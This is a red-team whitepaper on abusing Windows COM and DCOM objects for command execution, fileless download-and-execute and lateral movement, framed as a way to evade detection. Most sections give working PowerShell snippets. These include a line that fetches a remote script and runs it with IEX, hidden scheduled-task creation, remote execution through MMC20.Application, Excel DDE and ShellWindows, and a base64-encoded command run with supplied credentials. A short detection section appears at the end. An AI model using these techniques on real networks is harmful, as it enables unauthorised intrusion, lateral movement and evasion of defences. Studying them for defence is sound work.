Abusing COM & DCOM objects

By Haboob Team
 Abusing COM & DCOM objects

Table of Contents
Introduction ........................................................................................................... 3
What is a COM Object? .......................................................................................... 3
What is the difference between COM and DCOM objects? ................................... 3
Why COM Objects? ................................................................................................ 3
Command execution using COM objects ............................................................... 5
COM object with CLSID {E430E93D-09A9-4DC5-80E3-CBB2FB9AF28E} .................... 5
COM object with CLSID {F5078F35-C551-11D3-89B9-0000F81FE221}
(Msxml2.XMLHTTP.3.0) .................................................................................................................. 6
COM object with CLSID {0F87369F-A4E5-4CFC-BD3E-73E6154572DD}..................... 7
COM object with CLSID {9BA05972-F6A8-11CF-A442-00A0C90A8F39} for
ShellWindows ..................................................................................................................................... 8
COM object with CLSID {C08AFD90-F2A1-11D1-8455-00A0C91F3880} for
ShellBrowserWindow ...................................................................................................................... 9
Lateral movements using DCOM.......................................................................... 10
MMC Application Class (MMC20.Application) .................................................................... 10
EXCEL DDE (Excel.Application) ................................................................................................... 11
internetexplorer.Application in iexplorer.exe ..................................................................... 12
DCOM object with CLSID {9BA05972-F6A8-11CF-A442-00A0C90A8F39} for
ShellWindows ................................................................................................................................... 13
DCOM object with CLSID {C08AFD90-F2A1-11D1-8455-00A0C91F3880} for
ShellBrowserWindow .................................................................................................................... 13
Passing credentials for non-interactive shell ........................................................ 14
Detection ............................................................................................................. 15
References ........................................................................................................... 16

Copyright © 2020 Haboob Contact Haboob: info@haboob.sa 1

 Abusing COM & DCOM objects

Table of Figures

Figure 1 CLSID {E430E93D-09A9-4DC5-80E3-CBB2FB9AF28E}................................ 5

Figure 2 execute {E430E93D-09A9-4DC5-80E3-CBB2FB9AF28E} ............................ 5
Figure 3 CLSID {F5078F35-C551-11D3-89B9-0000F81FE221} ................................. 6
Figure 4 CLSID {9BA05972-F6A8-11CF-A442-00A0C90A8F39} ................................ 8
Figure 5 CLSID {C08AFD90-F2A1-11D1-8455-00A0C91F3880}................................ 9
Figure 6 DCOM (MMC20.Application) .................................................................. 10
Figure 7 Execute (MMC20.Application) ................................................................ 10
Figure 8 method DDEInitiate of Excel.Application ................................................ 11
Figure 9 DisplayAlerts method of Excel.Application ............................................. 11
Figure 10 execute Excel.Application DCOM ......................................................... 11
Figure 11 Enumrating internetexplorer.Application ............................................. 12
Figure 12 Executing ShellWindows ...................................................................... 13
Figure 13 Passing credentials for non-interactive shell ........................................ 14
Figure 14 System Event ID 10010 ......................................................................... 15

Copyright © 2020 Haboob Contact Haboob: info@haboob.sa 2

 Abusing COM & DCOM objects

Introduction
Nowadays organization’s security members became familiar with most of popular
lateral movements techniques, which makes red teaming more difficult, therefor
applying the latest techniques of initial access and lateral movements is a crucial for a
successful attack, in this paper we will cover some aspects of abusing DCOM objects
and several interesting COM objects were discovered by researchers that allow task
scheduling, fileless download & execute as well as command execution to conduct
lateral movements inside the network, note that the usage of these objects can be used
to defeat detection based on process behavior and heuristic signatures.

What is a COM object?

COM objects stands for (Component Object Model) which is a platform-independent,
distributed, object-oriented system for creating binary software components that can
interact. COM is the foundation technology for Microsoft's OLE (compound
documents), ActiveX (Internet-enabled components), as well as others. [1]

What is the difference between COM and DCOM objects?

As we earlier defined COM objects the main difference is that COM is executed at a
local level, at the client's machine. Where on the other hand DCOM (Distributed
Component Object Model) runs at the server end, where you pass instructions to the
DCOM object and get it executed over the network. In a simpler language we can call
DCOM as (COM via RPC).

Why COM objects?

The advantage of using those COM objects is that from a parent and child process
relationship it looks legit because anything executed remotely (i.e. cmd.exe,
powershell.exe etc.) will be a child process which is very common in many cases for
example a child process of explorer.exe.

Copyright © 2020 Haboob Contact Haboob: info@haboob.sa 3

 Abusing COM & DCOM objects

How Does DCOM Work?

The Windows Registry contains the DCOM configuration data in 3 identifiers:
- CLSID – The Class Identifier (CLSID) is a Global Unique Identifier (GUID). Windows
stores a CLSID for each installed class in a program. When you need to run a class,
you need the correct CLSID, so Windows knows where to go and find the program.

- PROGID – The Programmatic Identifier (PROGID) is an optional identifier a

programmer can substitute for the more complicated and strict CLSID. PROGIDs
are usually easier to read and understand. However there are no restrictions on
how many PROGIDs can have the same name, which causes issues on occasion.

- APPID – The Application Identifier (APPID) identifies all of the classes that are part
of the same executable and the permissions required to access it. DCOM cannot
work if the APPID isn’t correct.

To make a COM object accessible by DCOM, an AppID must be associated with the
CLSID of the class and appropriate permissions need to be given to the AppID. A
COM object without an associated AppID cannot be directly accessed from a remote
machine.

A basic DCOM transaction looks like this:

1. The client computer requests the remote computer to create an object by its
CLSID or PROGID. If the client passes the APPID, the remote computer looks up
the CLSID using the PROGID.
2. The remote machine checks the APPID and verifies the client has permissions to
create the object.
3. DCOMLaunch.exe (if an EXE) or DLLHOST.exe (if a DLL) will create an instance of
the class the client computer requested.
4. Communication is successful!
5. The Client can now access all functions in the class on the remote computer.

Copyright © 2020 Haboob Contact Haboob: info@haboob.sa 4

 Abusing COM & DCOM objects

Command execution using COM objects

COM object with CLSID {E430E93D-09A9-4DC5-80E3-CBB2FB9AF28E}:

A researcher “Charles Hamilton” form Fireeye discovered that prchauto.dll which is
located under (C:\Program Files (x86)\Windows Kits\10\App Certification
Kit\prchauto.dll) has a class named ProcessChain exposing a CommandLine property
and a Start method.

Figure 1 CLSID {E430E93D-09A9-4DC5-80E3-CBB2FB9AF28E}

Start accepts a reference to a Boolean value. Commands can be started as follow:[2]

$handle = [activator]::CreateInstance([type]::GetTypeFromCLSID("E430E93D-09A9-4DC5-80E3-
CBB2FB9AF28E"))
$handle.CommandLine = "cmd /c whoami"
$handle.Start([ref]$True)

Figure 2 execute {E430E93D-09A9-4DC5-80E3-CBB2FB9AF28E}

Copyright © 2020 Haboob Contact Haboob: info@haboob.sa 5

 Abusing COM & DCOM objects

COM object with CLSID {F5078F35-C551-11D3-89B9-0000F81FE221}

(Msxml2.XMLHTTP.3.0):
Exposes an XML HTTP 3.0 feature that can be used to download arbitrary code for
execution without writing the payload to the disk and without triggering rules that look
for the commonly-used System.Net.WebClient. The XML HTTP 3.0 object is usually used
to perform AJAX requests. In this case, data fetched can be directly executed using the
Invoke-Expression cmdlet (IEX) which can lead to Fileless Download and Execute. [2]

Figure 3 CLSID {F5078F35-C551-11D3-89B9-0000F81FE221}

$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-
0000F81FE221")); $o.Open("GET", "http://10.10.10.10/code.ps1", $False); $o.Send(); IEX
$o.responseText;

Copyright © 2020 Haboob Contact Haboob: info@haboob.sa 6

 Abusing COM & DCOM objects

COM object with CLSID {0F87369F-A4E5-4CFC-BD3E-73E6154572DD}:

This com object implements the Schedule.Service class for operating the Windows Task
Scheduler Service. This COM object allows privileged users to schedule a task on a host
(including a remote host) without using the schtasks.exe binary or the schtasks.exe at
command. [2]

$TaskName = [Guid]::NewGuid().ToString()
$Instance = [activator]::CreateInstance([type]::GetTypeFromProgID("Schedule.Service"))
$Instance.Connect()
$Folder = $Instance.GetFolder("\")
$Task = $Instance.NewTask(0)
$Trigger = $Task.triggers.Create(0)
$Trigger.StartBoundary = Convert-Date -Date ((Get-Date).addSeconds($Delay))
$Trigger.EndBoundary = Convert-Date -Date ((Get-Date).addSeconds($Delay + 120))
$Trigger.ExecutionTimelimit = "PT5M"
$Trigger.Enabled = $True
$Trigger.Id = $Taskname
$Action = $Task.Actions.Create(0)
$Action.Path = “cmd.exe”
$Action.Arguments = “/c whoami”
$Action.HideAppWindow = $True
$Folder.RegisterTaskDefinition($TaskName, $Task, 6, "", "", 3)

function Convert-Date {
param(
[datetime]$Date
)
PROCESS {
$Date.Touniversaltime().tostring("u") -replace " ","T"
}
}

Copyright © 2020 Haboob Contact Haboob: info@haboob.sa 7

 Abusing COM & DCOM objects

COM object with CLSID {9BA05972-F6A8-11CF-A442-00A0C90A8F39} for

ShellWindows:
This method is hosted by an existing explorer.exe process, ShellWindow COM object is
using the “Document.Application” property. The recursive COM object method
discovery found that you can call the “ShellExecute” method on the object returned by
the “Document.Application.Parent” property

Figure 4 CLSID {9BA05972-F6A8-11CF-A442-00A0C90A8F39}

$hb = [activator]::CreateInstance([type]::GetTypeFromCLSID("9BA05972-F6A8-11CF-A442-
00A0C90A8F39"))
$item = $hb.Item()
$item.Document.Application.ShellExecute("cmd.exe","/c calc.exe","c:\windows\system32",$null,0)

Copyright © 2020 Haboob Contact Haboob: info@haboob.sa 8

 Abusing COM & DCOM objects

COM object with CLSID {C08AFD90-F2A1-11D1-8455-00A0C91F3880} for

ShellBrowserWindow:
Just like ShellWindows, this method is hosted by an existing explorer.exe process,
ShellBrowserWindow COM object is using the “Document.Application” property and you
can call the “ShellExecute” method on the object returned by the
“Document.Application.Parent” property

Figure 5 CLSID {C08AFD90-F2A1-11D1-8455-00A0C91F3880}

$hb = [activator]::CreateInstance([type]::GetTypeFromCLSID("C08AFD90-F2A1-11D1-8455-
00A0C91F3880"))
$hb.Document.Application.Parent.ShellExecute("calc.exe")

Copyright © 2020 Haboob Contact Haboob: info@haboob.sa 9

 Abusing COM & DCOM objects

Lateral movements using DCOM

MMC Application Class (MMC20.Application):

Discovered by Matt Nelson back in 2007, This COM object allows you to script
components of MMC snap-in operations, however Matt discovered that we can
leverage a method named (ExecuteShellCommand) under Document.ActiveView to
execute commands over the network.

Figure 6 DCOM (MMC20.Application)

We can use ExecuteShellCommand method of MMC20.Application to execute

command remotely or start a process

$hb = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","192.168.126.134"))
$hb.Document.ActiveView.ExecuteShellCommand('cmd',$null,'/c echo Haboob > C:\hb.txt','7')

Figure 7 Execute (MMC20.Application)

Copyright © 2020 Haboob Contact Haboob: info@haboob.sa 10

 Abusing COM & DCOM objects

EXCEL DDE (Excel.Application):

DDE functionality in Office applications could be used remotely through DCOM first
published by Cybereason

Figure 8 method DDEInitiate of Excel.Application

The DDEInitiate method exposed by the Excel.Application objects limits the App
parameter to eight characters But the Topic has a much more manageable character
limit of 1,024, which is imposed by the CreateProcess function, Furthermore, the
method appends ".exe" to the App parameter, so "cmd.exe" tries to run
"cmd.exe.exe", which will obviously fail, so we need to remove the extension (.exe)
when calling the method, also it will pop up some alert, researcher found that it can be
disabled by using DisplayAlerts property.[3]

Figure 9 DisplayAlerts method of Excel.Application

$hb = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application","192.168.126.134"))
$hb.DisplayAlerts = $false
$hb.DDEInitiate('cmd','/c echo Haboob > C:\hb.txt')

Figure 10 execute Excel.Application DCOM

Copyright © 2020 Haboob Contact Haboob: info@haboob.sa 11

 Abusing COM & DCOM objects

internetexplorer.Application in iexplorer.exe:
One of the interesting techniques discovered by homjxi0e, you can open internet
Explorer browser on remote machines by using navigate methods which you can use it
get command execution by browser exploits.

Figure 11 Enumrating internetexplorer.Application

$Object_COM =
[Activator]::CreateInstance([type]::GetTypeFromProgID("InternetExplorer.Application","192.168.126
.134"))
$Object_COM.Visible = $true
$Object_COM.Navigate("http://192.168.100.1/exploit")

Copyright © 2020 Haboob Contact Haboob: info@haboob.sa 12

 Abusing COM & DCOM objects

DCOM object with CLSID {9BA05972-F6A8-11CF-A442-00A0C90A8F39} for

ShellWindows:
As we showed on command execution section earlier this COM object can also be used
remotely by adding remote IP after CLSID.

Figure 12 Executing ShellWindows

$hb = [activator]::CreateInstance([type]::GetTypeFromCLSID("9BA05972-F6A8-11CF-A442-
00A0C90A8F39",”192.168.1.1”))
$item = $hb.Item()
$item.Document.Application.ShellExecute("cmd.exe","/c calc.exe","c:\windows\system32",$null,0)

DCOM object with CLSID {C08AFD90-F2A1-11D1-8455-00A0C91F3880} for

ShellBrowserWindow:
Just like ShellWindows this COM object can also be used to execute commands on remote
machines.

$hb = [activator]::CreateInstance([type]::GetTypeFromCLSID("C08AFD90-F2A1-11D1-8455-
00A0C91F3880",”192.168.1.1”))
$hb.Document.Application.Parent.ShellExecute("calc.exe")

Copyright © 2020 Haboob Contact Haboob: info@haboob.sa 13

 Abusing COM & DCOM objects

Passing credentials for non-interactive shell:

DCOM objects runs under current user session which can be a problem if we have a
non-interactive shell and we want to run it under higher privileged user. A quick
solution is to use RunAs implementation by antonioCoco in C# , which we can integrate
it with our chosen DCOM object to pass credentials in non-interactive shell (note this
will be a better choice than invoke-command since it uses WinRM)
First we need to encode our chosen DCOM object using base64 i.e.:

[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('$hb =
[activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","192.168.126.134"));$
hb.Document.ActiveView.ExecuteShellCommand("cmd",$null,"/c echo Haboob > C:\hb.txt","7")'))

Then we can call invoke-RunasCs function using the following command

Invoke-RunasCs -Domain test -Username administrator -Password P@ssw0rd -Command "powershell

-e
JABoAGIAIAA9ACAAWwBhAGMAdABpAHYAYQB0AG8AcgBdADoAOgBDAHIAZQBhAHQAZQBJAG4Acw
B0AGEAbgBjAGUAKABbAHQAeQBwAGUAXQA6ADoARwBlAHQAVAB5AHAAZQBGAHIAbwBtAFAAcgB
vAGcASQBEACgAIgBNAE0AQwAyADAALgBBAHAAcABsAGkAYwBhAHQAaQBvAG4AIgAsACIAMQA5AD
IALgAxADYAOAAuADEAMgA2AC4AMQAzADQAIgApACkAOwAkAGgAYgAuAEQAbwBjAHUAbQBlAG4A
dAAuAEEAYwB0AGkAdgBlAFYAaQBlAHcALgBFAHgAZQBjAHUAdABlAFMAaABlAGwAbABDAG8AbQBt
AGEAbgBkACgAIgBjAG0AZAAiACwAJABuAHUAbABsACwAIgAvAGMAIABlAGMAaABvACAASABhAGIAb
wBvAGIAIAA+ACAAQwA6AFwAaABiAC4AdAB4AHQAIgAsACIANwAiACkA"

Figure 13 Passing credentials for non-interactive shell

Copyright © 2020 Haboob Contact Haboob: info@haboob.sa 14

 Abusing COM & DCOM objects

Detection

 Using these DCOM methods will (likely) require privileged access to the remote
machine. Protect privileged domain accounts. Avoid password re-use across local
machine accounts.
 Ensure that defense-in-depth controls, host-based security products, and host
monitoring are in place to detect/deter suspicious activity. Enable host-based
firewalls to prevent RPC/DCOM interaction and instantiation.
 Monitor the file system (and registry) for newly introduced artifacts and changes.
 Monitor for suspicious use of PowerShell within the environment. Enforce
Constrained Language Mode wherever/whenever possible (*Note: This may be
difficult for privileged accounts).
 Upon DCOM invocation ‘failure’, System Event ID 10010 (Error, DistributedCOM)
will be generated on the target machine with reference to the CLSID: [4]

Figure 14 System Event ID 10010

Copyright © 2020 Haboob Contact Haboob: info@haboob.sa 15

 Abusing COM & DCOM objects

References
- https://docs.microsoft.com/en-us/windows/win32/com/the-component-object-
model
- https://www.varonis.com/blog/dcom-distributed-component-object-model/
- https://codewhitesec.blogspot.com/2018/07/lethalhta.html
- https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects-
part-two.html
- https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-
application-com-object/
- https://hackdefense.com/assets/downloads/automating-the-enumeration-of-
possible-dcom-vulnerabilities-axel-boesenach-v1.0.pdf
- https://homjxi0e.wordpress.com/2018/02/15/lateral-movement-using-
internetexplorer-application-object-com/
- https://bohops.com/2018/04/28/abusing-dcom-for-yet-another-lateral-
movement-technique/

Copyright © 2020 Haboob Contact Haboob: info@haboob.sa 16